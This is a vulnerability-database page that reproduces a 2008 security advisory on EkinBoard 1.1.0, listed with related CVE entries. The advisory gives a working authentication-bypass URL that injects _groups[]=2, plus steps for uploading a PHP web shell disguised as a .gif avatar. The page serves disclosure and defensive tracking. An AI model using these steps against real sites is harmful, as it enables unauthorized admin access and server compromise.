Lucene search
+L

EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass

🗓️ 07 Jan 2008 00:00:00Reported by Eugene MinaevType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

EkinBoard 1.1.0 Remote File Upload/Auth Bypas

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2008-7156
2 Sep 200917:00
cve
cve
CVE
CVE-2008-7157
2 Sep 200917:00
cve
cvelist
Cvelist
CVE-2008-7156
2 Sep 200917:00
cvelist
cvelist
Cvelist
CVE-2008-7157
2 Sep 200917:00
cvelist
euvd
EUVD
EUVD-2008-7115
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-7116
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-7156
2 Sep 200917:30
nvd
nvd
NVD
CVE-2008-7157
2 Sep 200917:30
nvd
prion
Prion
Authorization
2 Sep 200917:30
prion
prion
Prion
Unrestricted file upload
2 Sep 200917:30
prion
Rows per page
----[ EkinBoard Remote File Upload / Auth Bypass ... ITDefence.ru Antichat.ru ]

							EkinBoard >= 1.1.0 Remote File Upload / Auth Bypass
							Eugene Minaev [email protected]
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
			. \_\\________[________________________________________]_________//_//_/ . .

		We can bypass admin authorization if register_globals on . All admin panel script include this code

		<?php
		if(!in_array(2, $_groups)){
		die("<center><span class=red>You need to be an admin to access this page!</span></center>");
		}
		?>

		test1.ru/skvoznoy/backup.php?_groups[]=2

		There is a bug in upload function . We can upload any file bypass filters . Name your shell like
		file.php.gif and select it as your avatar . Then check uploaded/avatars/filename_your_id.php

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation